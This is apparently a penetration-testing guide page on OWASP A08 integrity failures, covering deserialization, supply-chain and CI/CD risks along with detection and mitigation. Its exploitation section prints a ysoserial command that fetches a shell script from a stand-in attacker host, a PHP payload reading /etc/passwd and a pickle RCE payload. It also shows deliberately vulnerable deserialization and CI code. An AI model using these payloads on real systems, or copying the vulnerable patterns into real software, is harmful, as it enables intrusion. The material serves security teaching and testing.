OWASP A08:2021 - Software and Data Integrity Failures

Overview

Software and Data Integrity Failures relate to code and infrastructure that does not protect against integrity violations. This occurs when applications rely on plugins, libraries, or modules from untrusted sources, repositories, and CDNs, or when an insecure CI/CD pipeline introduces the potential for unauthorized access, malicious code, or system compromise.

CWE Mappings: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere), CWE-494 (Download of Code Without Integrity Check), CWE-502 (Deserialization of Untrusted Data)

Common Attack Scenarios

1. Supply Chain Attacks

• Malicious packages in npm, PyPI, Maven repositories

• Compromised third-party libraries or dependencies

• CDN compromise serving malicious JavaScript

• Typosquatting attacks on package names

2. Insecure Deserialization

• PHP object injection

• Java deserialization attacks

• Python pickle exploitation

• .NET BinaryFormatter vulnerabilities

3. CI/CD Pipeline Compromise

• Unauthorized code modifications during build process

• Malicious commits through compromised developer accounts

• Insecure artifact repositories

• Weak access controls on deployment pipelines

4. Auto-Update Mechanisms

• Applications that auto-update without signature verification

• Man-in-the-middle attacks on update channels

• Compromised update servers

• Rollback attacks to vulnerable versions

Technical Details

Insecure Deserialization Vulnerabilities

PHP Object Injection

// Vulnerable code
$user_data = unserialize($_COOKIE['user']);

// Magic methods that can be exploited
class User {
    public function __destruct() {
        file_get_contents($this->url); // SSRF/LFI possible
    }
}

Java Deserialization

// Vulnerable code
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
MyObject obj = (MyObject) ois.readObject();

Python Pickle

# Vulnerable code
import pickle
user_data = pickle.loads(base64.b64decode(cookie_value))

Supply Chain Indicators

• Dependencies from unofficial sources

• Missing integrity checks (hashes, signatures)

• Outdated or unmaintained packages

• Excessive permissions requested by dependencies

Detection Methods

Static Analysis

• Dependency scanning tools (OWASP Dependency-Check, Snyk, WhiteSource)

• Code review for deserialization patterns

• CI/CD pipeline security analysis

• Software Bill of Materials (SBOM) generation

Dynamic Testing

• Monitor network traffic for suspicious dependencies

• Test deserialization endpoints with malicious payloads

• Verify signature validation mechanisms

• Check update mechanisms for integrity verification

Manual Testing Techniques

Deserialization Testing

1. Identify serialization formats:

   • Look for base64 encoded data

   • Common patterns: rO0AB (Java), YTo (PHP), gASV (Python pickle)

2. Test with known gadget chains:

   • ysoserial for Java

   • phpggc for PHP

   • Custom pickle payloads for Python

3. Monitor application behavior:

   • DNS queries (using Burp Collaborator/interactsh)

   • File system access

   • Network connections

Supply Chain Testing

1. Dependency analysis:

   • Check package.json, requirements.txt, pom.xml

   • Verify package signatures and checksums

   • Look for suspicious or recently updated dependencies

2. CDN integrity testing:

   • Check for Subresource Integrity (SRI) attributes

   • Test with modified external resources

   • Monitor for unexpected script loading

Common Vulnerable Patterns

Missing Integrity Checks

<!-- Vulnerable: No SRI -->
<script src="https://cdn.example.com/library.js"></script>

<!-- Secure: With SRI -->
<script src="https://cdn.example.com/library.js" 
        integrity="sha384-abc123..." 
        crossorigin="anonymous"></script>

Insecure Deserialization Endpoints

# Vulnerable Flask endpoint
@app.route('/api/user', methods=['POST'])
def update_user():
    user_data = pickle.loads(request.data)  # Dangerous!
    return process_user(user_data)

Weak CI/CD Security

# Vulnerable CI configuration
- name: Deploy
  run: |
    curl -O http://untrusted-source.com/deploy-script.sh
    chmod +x deploy-script.sh
    ./deploy-script.sh  # No integrity verification

Exploitation Techniques

Java Deserialization with ysoserial

# Generate malicious payload
java -jar ysoserial.jar CommonsCollections6 "wget http://attacker.com/shell.sh -O /tmp/shell.sh" > payload.ser

# Base64 encode for web delivery
base64 payload.ser > payload.b64

PHP Object Injection

// Malicious payload construction
class User {
    public $file;
    public function __destruct() {
        include($this->file);
    }
}

$malicious = new User();
$malicious->file = '/etc/passwd';
$payload = serialize($malicious);

Python Pickle RCE

import pickle
import base64

class RCE:
    def __reduce__(self):
        return (eval, ("__import__('os').system('id')",))

payload = base64.b64encode(pickle.dumps(RCE()))

Mitigation Strategies

1. Implement Integrity Verification

• Use package-lock.json, requirements.txt with pinned versions

• Implement Subresource Integrity (SRI) for external resources

• Verify digital signatures on software updates

• Use checksums and cryptographic hashes

2. Secure Deserialization Practices

• Avoid deserializing untrusted data

• Use safe serialization formats (JSON instead of native serialization)

• Implement allow-lists for deserializable classes

• Apply principle of least privilege

3. Supply Chain Security

• Regularly audit and update dependencies

• Use private repositories for internal packages

• Implement dependency scanning in CI/CD pipeline

• Monitor for new vulnerabilities in dependencies

4. CI/CD Pipeline Hardening

• Implement code signing for all builds

• Use immutable build environments

• Require multi-party approval for production deployments

• Implement comprehensive logging and monitoring

Detection Tools

Open Source

• OWASP Dependency-Check: Identifies known vulnerable dependencies

• Safety (Python): Scans Python dependencies for known security vulnerabilities

• npm audit: Built-in npm vulnerability scanner

• Snyk Open Source: Dependency vulnerability scanner

Commercial

• Snyk: Comprehensive supply chain security platform

• WhiteSource (Mend): Software composition analysis

• Veracode Software Composition Analysis: Enterprise SCA solution

• JFrog Xray: Universal artifact analysis

Testing Checklist

Pre-Assessment

• Identify all external dependencies and their sources

• Map data serialization/deserialization points

• Review CI/CD pipeline configuration

• Document third-party integrations

During Testing

• Test deserialization endpoints with malicious payloads

• Verify integrity checking mechanisms

• Assess dependency update processes

• Test auto-update functionality

• Review package repository configurations

Post-Assessment

• Generate Software Bill of Materials (SBOM)

• Document vulnerable dependencies

• Provide remediation timeline based on risk

• Recommend security controls for CI/CD pipeline

Remediation Priority

Critical: Active exploitation of deserialization vulnerabilities High: Missing integrity checks on critical dependencies Medium: Outdated dependencies with known vulnerabilities Low: Missing SRI on non-critical external resources

Additional Resources

• OWASP Software Component Verification Standard

• NIST Cybersecurity Supply Chain Risk Management

• ysoserial - Java Deserialization Tool

• phpggc - PHP Generic Gadget Chains

---

This reference is part of a comprehensive OWASP Top 10 penetration testing guide. For updates and additional resources, visit the project repository.